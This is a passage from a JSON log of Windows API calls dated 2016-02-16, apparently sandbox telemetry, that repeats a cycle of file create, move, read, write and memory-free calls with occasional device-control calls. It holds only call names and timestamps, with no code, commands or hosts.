17:41:58,226", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,326", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,336", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,376", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,426", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,436", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,476", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,486", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,486", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,506", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,506", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,516", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,516", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,516", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,546", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:58,546", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,566", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 